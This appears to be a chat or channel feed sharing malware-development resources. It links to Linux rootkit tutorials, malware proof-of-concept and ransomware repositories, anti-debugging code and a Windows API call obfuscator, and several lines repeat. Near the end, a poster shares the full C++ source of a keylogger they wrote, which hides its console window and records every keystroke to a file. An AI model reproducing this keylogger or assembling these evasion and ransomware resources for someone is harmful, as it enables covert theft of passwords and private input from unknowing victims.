What Windows binaries can do:
https://lolbas-project.github.io/
https://lolbas-project.github.io/
<Linux~>
techniques:
https://tmpout.sh/
https://cpl0.zip
crash course on linux rootkits:
https://xcellerator.github.io/categories/linux/
possibly the best resource at ur disposal, kernel source cross referencer
https://elixir.bootlin.com/linux/latest/source/kernel
linux internals:
https://github.com/theja0473/My-Lib-Books-1/blob/master/UnderStanding%20The%20Linux%20Kernel%203rd%20Edition%20V413HAV.pdf
use google translate but these chinese people have some insane techniques:
https://blog.csdn.net
techniques:
https://tmpout.sh/
https://cpl0.zip
crash course on linux rootkits:
https://xcellerator.github.io/categories/linux/
possibly the best resource at ur disposal, kernel source cross referencer
https://elixir.bootlin.com/linux/latest/source/kernel
linux internals:
https://github.com/theja0473/My-Lib-Books-1/blob/master/UnderStanding%20The%20Linux%20Kernel%203rd%20Edition%20V413HAV.pdf
use google translate but these chinese people have some insane techniques:
https://blog.csdn.net
linux
linux :: TheXcellerator
-malware creation to data exfiltration
https://blog.hacktivesecurity.com/index.php/2023/06/05/inside-the-mind-of-a-cyber-attacker-from-malware-creation-to-data-exfiltration-part-1/
https://blog.hacktivesecurity.com/index.php/2023/06/05/inside-the-mind-of-a-cyber-attacker-from-malware-creation-to-data-exfiltration-part-1/
Repo containing different types of malware writing concepts
https://github.com/sufyandaredevil/MALWARE_DEV
https://github.com/sufyandaredevil/MALWARE_DEV
GitHub
GitHub - sufyandaredevil/MALWARE_DEV: Repo contains POCs taken from the course Malware Development 1: The Basics and its succeeding…
Repo contains POCs taken from the course Malware Development 1: The Basics and its succeeding Malware Development 2: Advanced Techniques - sufyandaredevil/MALWARE_DEV
👍1
IHkey is win32 ransomware built using VS 2022 + C++ 17
(Lot of technique)
https://github.com/mr3moe/IHkey
(Lot of technique)
https://github.com/mr3moe/IHkey
GitHub
GitHub - mr3moe/IHkey: IHkey is win32 ransomware built using VS 2022 + C++ 17
IHkey is win32 ransomware built using VS 2022 + C++ 17 - mr3moe/IHkey
👍1
A collection of c++ programs that demonstrate common ways to detect the presence of an attached debugger.
https://github.com/ThomasThelen/Anti-Debugging
https://github.com/ThomasThelen/Anti-Debugging
GitHub
GitHub - ThomasThelen/Anti-Debugging: A collection of c++ programs that demonstrate common ways to detect the presence of an attached…
A collection of c++ programs that demonstrate common ways to detect the presence of an attached debugger. - ThomasThelen/Anti-Debugging
👍1
👍1
`This's pretty forward, let's say I've used VirtualProtect and I want to obfuscate it with Sleep, the tool will manipulate the IAT so that the thunk that points to VirtualProtect will point instead to Sleep, now at executing the file, windows loader will load Sleep instead of VirtualProtect, and moves the execution to the entry point, from there the execution will be redirected to the shellcode, the tool put before, to find the address of VirtualProtect and use it to replace the address of Sleep which assigned before by the loader.
https://github.com/d35ha/CallObfuscator
GitHub
GitHub - d35ha/CallObfuscator: Obfuscate specific windows apis with different apis
Obfuscate specific windows apis with different apis - d35ha/CallObfuscator
🤓1
👍1
Source Byte
Loggy is a keylogger that is created in C++ https://github.com/Black0utDev/Loggy
simple one i wrote
#include <Windows.h>
#include <iostream>
#include <fstream>
#include <stdio.h>
#include <string>
using namespace std;
void WriteToLog(LPCSTR text)
{
ofstream logFile;
logFile.open("Keys.txt", fstream::app);
// logFile << text;
logFile.close();
}
int main()
{
char key;
while (TRUE)
{
ShowWindow(GetConsoleWindow(), 0);
Sleep(10);
for (key = 0x8; key <= 0xBE; key++)
{
if (GetAsyncKeyState(key) == -32767)
{
ofstream logFile;
logFile.open("Keys.txt", fstream::app);
logFile << key;
logFile.close();
}
}
}
return 0;
}
❤🔥2
Introduction to stack management in x86-64 architecture for Windows
(credits @3shw4r)
offensivecraft.wordpress.com…
#stack , #windows , #stack_managment
(credits @3shw4r)
offensivecraft.wordpress.com…
#stack , #windows , #stack_managment